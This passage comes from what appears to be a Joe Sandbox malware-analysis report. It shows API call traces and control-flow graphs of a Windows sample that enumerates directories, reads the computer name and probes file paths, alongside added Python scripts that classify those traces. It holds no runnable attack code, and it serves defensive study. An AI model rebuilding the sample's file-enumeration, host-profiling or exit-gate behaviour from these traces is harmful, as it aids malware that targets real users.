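    "2906 8f8fbf-8f8fcd StrCmpCA 2896->2906 2907 8f8fd8-8f8fea lstrlen 2896->2907 2908 8f8e56-8f8e65 lstrlen 2896->2908 2909 8f8ed4-8f8ee2 StrCmpCA 2896->2909 2910 8f8ef4-8f8f08 StrCmpCA 2896->2910 "
    "2897->2892 2936 8f8e43 2897->2936 2898->2897 2924 8f8f21-8f8f28 2898->2924 2899->2897 2925 8f8f41-8f8f48 2899->2925 2900->2897 2926 8f8f61-8f8f68 2900->2926 2901->2897 2927 8f8f81-8f8f88 2901->2927 "
    "2902->2897 2911 8f8f9d-8f8fa4 2902->2911 2920 8f8ebb-8f8ec0 call 8e2a20 2903->2920 2921 8f8ec3-8f8ecf call 8e2930 2903->2921 2904->2897 2914 8f8fb6-8f8fbd 2904->2914 2918 8f8e99-8f8ea5 call 8e2930 2905->2918 "
    "2919 8f8e91-8f8e96 call 8e2a20 2905->2919 2906->2897 2915 8f8fcf-8f8fd6 2906->2915 2916 8f8fec-8f8ff1 call 8e2a20 2907->2916 2917 8f8ff4-8f9000 call 8e2930 2907->2917 2912 8f8e6f-8f8e7b call 8e2930 2908->2912 "
    "2913 8f8e67-8f8e6c call 8e2a20 2908->2913 2909->2897 2923 8f8ee8-8f8eef 2909->2923 2910->2897 2911->2897 2945 8f9003-8f9005 2912->2945 2913->2912 2914->2897 2915->2897 2916->2917 2917->2945 2918->2945 "
    "2919->2918 2920->2921 2921->2945 2923->2897 2924->2897 2925->2897 2926->2897 2927->2897 2936->2894 2945->2897 2946 8f9007-8f9009 2945->2946 2946->2897 2947 8f900b-8f900d lstrcpy 2946->2947 2947->2897"
)

if __name__ == "__main__":
    for name, text in (("8e10c0", CFG_MEMCHECK), ("8f8dcb", CFG_BLOCKLIST)):
        g = parse_cfg(text)
        print(name, len(g.nodes), "blocks; exit gates:", exit_gates(g))
```

For 8e10c0 the only gate that carries an API label is the GlobalMemoryStatusEx block; the two unlabeled gates are the compare chain that follows it, so the value being tested is whatever that call returned. For 8f8dcb the gate is the very first StrCmpCA block, before the switch-like block 8f8e4f that dispatches to the remaining comparisons.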

                            Control-flow Graph

                            control_flow_graph 2957 902ca0-902cf2 GetProcessHeap RtlAllocateHeap GetComputerNameA 2958 902d14-902d29 2957->2958 2959 902cf4-902d06 2957->2959
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00902CCF
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00902CD6
                            • GetComputerNameA.KERNEL32(00000000,00000104), ref: 00902CEA
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateComputerNameProcess
                            • String ID:
                            • API String ID: 1664310425-0
                            • Opcode ID: 1d145901a61808dd79af4b1acbc968242f5910b61fc0a34b9b3af027652ea45c
                            • Instruction ID: b188ae29a7bfbef4d410fa74c99c6d5a1f71af765c06c2af70870a84e1ba3db2
                            • Opcode Fuzzy Hash: 1d145901a61808dd79af4b1acbc968242f5910b61fc0a34b9b3af027652ea45c
                            • Instruction Fuzzy Hash: B401ADB2A44248ABC710CF99ED49BAAB7BCF748B21F10426AF919D3780D774590086E1
                            APIs
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008F2524
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F2547
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008F2552
                            • lstrlen.KERNEL32(\*.*), ref: 008F255D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F257A
                            • lstrcat.KERNEL32(00000000,\*.*), ref: 008F2586
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F25BA
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 008F25D6
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                            • String ID: \*.*
                            • API String ID: 2567437900-1173974218
                            • Opcode ID: 3899dc73451611b9284926bee84fe6af5ec562f9a388ceaf3a2c7e0839334593
                            • Instruction ID: dd034c2c40a9e26218cd0e1f605629e9603706b3ccedf31df128eab6c98dfd06
                            • Opcode Fuzzy Hash: 3899dc73451611b9284926bee84fe6af5ec562f9a388ceaf3a2c7e0839334593
                            • Instruction Fuzzy Hash: 02A28E31A1125AAFCB21AF79DC89AAE7BB8FF44700F444128F909E7251DF74DE418B91
                            APIs
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008E16E2
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008E1719
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008E176C
                            • lstrcat.KERNEL32(00000000), ref: 008E1776
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008E17A2
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008E17EF
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008E17F9
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008E1825
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008E1875
                            • lstrcat.KERNEL32(00000000), ref: 008E187F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008E18AB
                            • lstrcpy.KERNEL32(00000000,?), ref: 008E18F3
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008E18FE
                            • lstrlen.KERNEL32(0091179C), ref: 008E1909
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008E1929
                            • lstrcat.KERNEL32(00000000,0091179C), ref: 008E1935
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008E195B
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008E1966
                            • lstrlen.KERNEL32(\*.*), ref: 008E1971
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008E198E
                            • lstrcat.KERNEL32(00000000,\*.*), ref: 008E199A
                              • Part of subcall function 00904250: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 0090427D
                              • Part of subcall function 00904250: lstrcpy.KERNEL32(00000000,?), ref: 009042B2
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008E19C3
                            • lstrcpy.KERNEL32(00000000,?), ref: 008E1A0E
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008E1A16
                            • lstrlen.KERNEL32(0091179C), ref: 008E1A21
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008E1A41
                            • lstrcat.KERNEL32(00000000,0091179C), ref: 008E1A4D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008E1A76
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008E1A81
                            • lstrlen.KERNEL32(0091179C), ref: 008E1A8C
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008E1AAC
                            • lstrcat.KERNEL32(00000000,0091179C), ref: 008E1AB8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008E1ADE
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008E1AE9
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008E1B11
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 008E1B45
                            • StrCmpCA.SHLWAPI(?,009117A8), ref: 008E1B70
                            • StrCmpCA.SHLWAPI(?,009117AC), ref: 008E1B8A
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008E1BC4
                            • lstrcpy.KERNEL32(00000000,?), ref: 008E1BFB
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008E1C03
                            • lstrlen.KERNEL32(0091179C), ref: 008E1C0E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008E1C31
                            • lstrcat.KERNEL32(00000000,0091179C), ref: 008E1C3D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008E1C69
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008E1C74
                            • lstrlen.KERNEL32(0091179C), ref: 008E1C7F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008E1CA2
                            • lstrcat.KERNEL32(00000000,0091179C), ref: 008E1CAE
                            • lstrlen.KERNEL32(?), ref: 008E1CBB
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008E1CDB
                            • lstrcat.KERNEL32(00000000,?), ref: 008E1CE9
                            • lstrlen.KERNEL32(0091179C), ref: 008E1CF4
                            • lstrcpy.KERNEL32(00000000,?), ref: 008E1D14
                            • lstrcat.KERNEL32(00000000,0091179C), ref: 008E1D20
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008E1D46
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008E1D51
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008E1D7D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008E1DE0
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008E1DEB
                            • lstrlen.KERNEL32(0091179C), ref: 008E1DF6
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008E1E19
                            • lstrcat.KERNEL32(00000000,0091179C), ref: 008E1E25
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008E1E4B
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008E1E56
                            • lstrlen.KERNEL32(0091179C), ref: 008E1E61
                            • lstrcpy.KERNEL32(00000000,?), ref: 008E1E81
                            • lstrcat.KERNEL32(00000000,0091179C), ref: 008E1E8D
                            • lstrlen.KERNEL32(?), ref: 008E1E9A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008E1EBA
                            • lstrcat.KERNEL32(00000000,?), ref: 008E1EC8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008E1EF4
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008E1F3E
                            • GetFileAttributesA.KERNEL32(00000000), ref: 008E1F45
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008E1F9F
                            • lstrlen.KERNEL32(012F92F0), ref: 008E1FAE
                            • lstrcpy.KERNEL32(00000000,?), ref: 008E1FDB
                            • lstrcat.KERNEL32(00000000,?), ref: 008E1FE3
                            • lstrlen.KERNEL32(0091179C), ref: 008E1FEE
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008E200E
                            • lstrcat.KERNEL32(00000000,0091179C), ref: 008E201A
                            • lstrcpy.KERNEL32(00000000,?), ref: 008E2042
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008E204D
                            • lstrlen.KERNEL32(0091179C), ref: 008E2058
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008E2075
                            • lstrcat.KERNEL32(00000000,0091179C), ref: 008E2081
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$File$AttributesFindFirstFolderPath
                            • String ID: \*.*
                            • API String ID: 4127656590-1173974218
                            • Opcode ID: c4f9cfaca1d425c1b96306228017656a7e65e78815ec79f0651a59bbf92c7bcf
                            • Instruction ID: 664e1c3b57a588e2e6c123d77e28da8f0b54de0060c6b762eb9f62e13fb80115
                            • Opcode Fuzzy Hash: c4f9cfaca1d425c1b96306228017656a7e65e78815ec79f0651a59bbf92c7bcf
                            • Instruction Fuzzy Hash: AC926031A1129AABCF21AF6ADC88AAE77BDFF46700F444124F805E7255DB70DE418B91
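The API listings above are long but repetitive: the records at 008F2524 and 008E16E2 are dominated by lstrcpy/lstrcat path assembly ending in FindFirstFileA on a `\*.*` pattern, the 008E16E2 record additionally compares each returned entry against two fixed strings with StrCmpCA and probes paths with GetFileAttributesA, and the 00902CCF record allocates a buffer and calls GetComputerNameA. Reducing each record to a handful of behaviour tags is the first thing an analyst does before deciding which functions to open in a disassembler. The script below is an added example, not code from the report or from Joe Sandbox. Its inputs are copied from the records above (the 008F2524 and 00902CCF records in full, and a selection of lines from the 008E16E2 record); the line grammar is inferred from them (an assumption: `• [Part of subcall function <addr>: ]<api>.<module>(<args>), ref: <addr>`); and the tag names are this example's own vocabulary. In particular "entry-name-filter" only records that FindFirstFileA results are compared against two fixed strings, which is consistent with skipping the `.` and `..` entries but is not established by the report.

```python
"""Reduce the per-function API listings of a Joe Sandbox report to a short
behaviour profile.

Added example, not part of the report. Input lines are copied from the
records above; the line grammar and the tag vocabulary are this example's
own (assumptions, see lead-in).
"""
import re
from collections import Counter, namedtuple

Call = namedtuple("Call", "api module args ref subcall")

LINE = re.compile(
    r"^\s*•\s+(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s+)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
POINTER = re.compile(r"^[0-9A-Fa-f]{8}$")   # an unresolved 32-bit argument


def parse_record(text):
    """Parse one record's API lines; lines that do not match are ignored."""
    calls = []
    for line in text.splitlines():
        m = LINE.match(line)
        if m:
            args = [a for a in m.group("args").split(",") if a != ""]
            calls.append(Call(m.group("api"), m.group("mod"), args,
                              m.group("ref"), m.group("sub")))
    return calls


def literal_args(calls):
    """Arguments the plugin resolved to text (neither a pointer nor '?')."""
    return sorted({a for c in calls for a in c.args
                   if a != "?" and not POINTER.match(a)})


def classify(calls):
    """Behaviour tags for a record; subcall lines count like direct calls."""
    apis = Counter(c.api for c in calls)
    lits = literal_args(calls)
    tags = []
    if "FindFirstFileA" in apis and "\\*.*" in lits:
        tags.append("directory-enumeration")
    if "FindFirstFileA" in apis and apis["StrCmpCA"] >= 2:
        tags.append("entry-name-filter")        # likely "." and "..", unproven
    if apis["lstrcpy"] + apis["lstrcat"] >= 4:
        tags.append("path-assembly")
    if "GetComputerNameA" in apis:
        tags.append("computer-name-lookup")
    if "SHGetFolderPathA" in apis:
        tags.append("known-folder-lookup")
    if "GetFileAttributesA" in apis:
        tags.append("path-existence-probe")
    return tags


# Copied from the report records above (raw strings keep the "\*.*" literal).
RECORD_8F2524 = r"""
• lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008F2524
• lstrcpy.KERNEL32(00000000,00000000), ref: 008F2547
• lstrcat.KERNEL32(00000000,00000000), ref: 008F2552
• lstrlen.KERNEL32(\*.*), ref: 008F255D
• lstrcpy.KERNEL32(00000000,00000000), ref: 008F257A
• lstrcat.KERNEL32(00000000,\*.*), ref: 008F2586
• lstrcpy.KERNEL32(00000000,00000000), ref: 008F25BA
• FindFirstFileA.KERNEL32(00000000,?), ref: 008F25D6
"""
RECORD_902CCF = r"""
• GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00902CCF
• RtlAllocateHeap.NTDLL(00000000), ref: 00902CD6
• GetComputerNameA.KERNEL32(00000000,00000104), ref: 00902CEA
"""
RECORD_8E16E2 = r"""
• lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008E16E2
• lstrlen.KERNEL32(\*.*), ref: 008E1971
• lstrcpy.KERNEL32(00000000,00000000), ref: 008E198E
• lstrcat.KERNEL32(00000000,\*.*), ref: 008E199A
  • Part of subcall function 00904250: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 0090427D
  • Part of subcall function 00904250: lstrcpy.KERNEL32(00000000,?), ref: 009042B2
• FindFirstFileA.KERNEL32(00000000,?), ref: 008E1B45
• StrCmpCA.SHLWAPI(?,009117A8), ref: 008E1B70
• StrCmpCA.SHLWAPI(?,009117AC), ref: 008E1B8A
• GetFileAttributesA.KERNEL32(00000000), ref: 008E1F45
"""

if __name__ == "__main__":
    for name, text in (("008F2524", RECORD_8F2524), ("00902CCF", RECORD_902CCF),
                       ("008E16E2", RECORD_8E16E2)):
        calls = parse_record(text)
        print(name, len(calls), "calls", literal_args(calls), classify(calls))
```

The pointer filter is what makes `literal_args` useful: the plugin prints resolved strings such as `\*.*` in place of the argument, so anything that is not eight hex digits or `?` is text the function actually passed, and the two StrCmpCA operands in the 008E16E2 record (009117A8 and 009117AC, four bytes apart) stay pointers because the report did not resolve them.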
                            APIs
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008F1A22
                            • lstrlen.KERNEL32(\*.*), ref: 008F1A2D
                            • lstrcpy.KERNEL32(00000000,?), ref: 008F1A4F
                            • lstrcat.KERNEL32(00000000,\*.*), ref: 008F1A5B
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F1A82
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 008F1A97
                            • StrCmpCA.SHLWAPI(?,009117A8), ref: 008F1AB7
                            • StrCmpCA.SHLWAPI(?,009117AC), ref: 008F1AD1
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008F1B0F
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008F1B42
                            • lstrcpy.KERNEL32(00000000,?), ref: 008F1B6A
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008F1B75
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F1B9C
                            • lstrlen.KERNEL32(0091179C), ref: 008F1BAE
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F1BD0
                            • lstrcat.KERNEL32(00000000,0091179C), ref: 008F1BDC
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F1C04
                            • lstrlen.KERNEL32(?), ref: 008F1C18
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F1C35
                            • lstrcat.KERNEL32(00000000,?), ref: 008F1C43
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F1C69
                            • lstrlen.KERNEL32(012F93E0), ref: 008F1C7F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F1CA9
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008F1CB4
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F1CDF
                            • lstrlen.KERNEL32(0091179C), ref: 008F1CF1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F1D13
                            • lstrcat.KERNEL32(00000000,0091179C), ref: 008F1D1F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F1D48
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F1D75
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008F1D80
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F1DA7
                            • lstrlen.KERNEL32(0091179C), ref: 008F1DB9
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F1DDB
                            • lstrcat.KERNEL32(00000000,0091179C), ref: 008F1DE7
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F1E10
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F1E3F
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008F1E4A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F1E71
                            • lstrlen.KERNEL32(0091179C), ref: 008F1E83
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F1EA5
                            • lstrcat.KERNEL32(00000000,0091179C), ref: 008F1EB1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F1EDA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F1F09
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008F1F14
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F1F3D
                            • lstrlen.KERNEL32(0091179C), ref: 008F1F69
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F1F86
                            • lstrcat.KERNEL32(00000000,0091179C), ref: 008F1F92
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F1FB8
                            • lstrlen.KERNEL32(012FDE90), ref: 008F1FCE
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F2002
                            • lstrlen.KERNEL32(0091179C), ref: 008F2016
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F2033
                            • lstrcat.KERNEL32(00000000,0091179C), ref: 008F203F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F2065
                            • lstrlen.KERNEL32(012FE2C0), ref: 008F207B
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F20AF
                            • lstrlen.KERNEL32(0091179C), ref: 008F20C3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F20E0
                            • lstrcat.KERNEL32(00000000,0091179C), ref: 008F20EC
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F2112
                            • lstrlen.KERNEL32(012EA7C8), ref: 008F2128
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F2150
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008F215B
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F2186
                            • lstrlen.KERNEL32(0091179C), ref: 008F2198
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F21B7
                            • lstrcat.KERNEL32(00000000,0091179C), ref: 008F21C3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F21E8
                            • lstrlen.KERNEL32(?), ref: 008F21FC
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F2220
                            • lstrcat.KERNEL32(00000000,?), ref: 008F222E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F2253
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008F228F
                            • lstrlen.KERNEL32(012FDF80), ref: 008F229E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F22C6
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008F22D1
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$FileFindFirst
                            • String ID: \*.*
                            • API String ID: 712834838-1173974218
                            • Opcode ID: eb6ed206f46425443d678eaea158e60eb07fb5af292b4db472a388ac7486e822
                            • Instruction ID: 0b7694107053418ad30482c4cd5e4879818a357cba27dfd585878ed667ae437a
                            • Opcode Fuzzy Hash: eb6ed206f46425443d678eaea158e60eb07fb5af292b4db472a388ac7486e822
                            • Instruction Fuzzy Hash: BB628C31A1166AABCB22AB79CC48ABFB7B9FF45700F444124B905E3251DF74DE418BA1
                            APIs
                            • wsprintfA.USER32 ref: 008F3A8C
                            • FindFirstFileA.KERNEL32(?,?), ref: 008F3AA3
                            • StrCmpCA.SHLWAPI(?,009117A8), ref: 008F3ACC
                            • StrCmpCA.SHLWAPI(?,009117AC), ref: 008F3AE6
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008F3B1F
                            • lstrcpy.KERNEL32(00000000,?), ref: 008F3B47
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008F3B52
                            • lstrlen.KERNEL32(0091179C), ref: 008F3B5D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F3B7A
                            • lstrcat.KERNEL32(00000000,0091179C), ref: 008F3B86
                            • lstrlen.KERNEL32(?), ref: 008F3B93
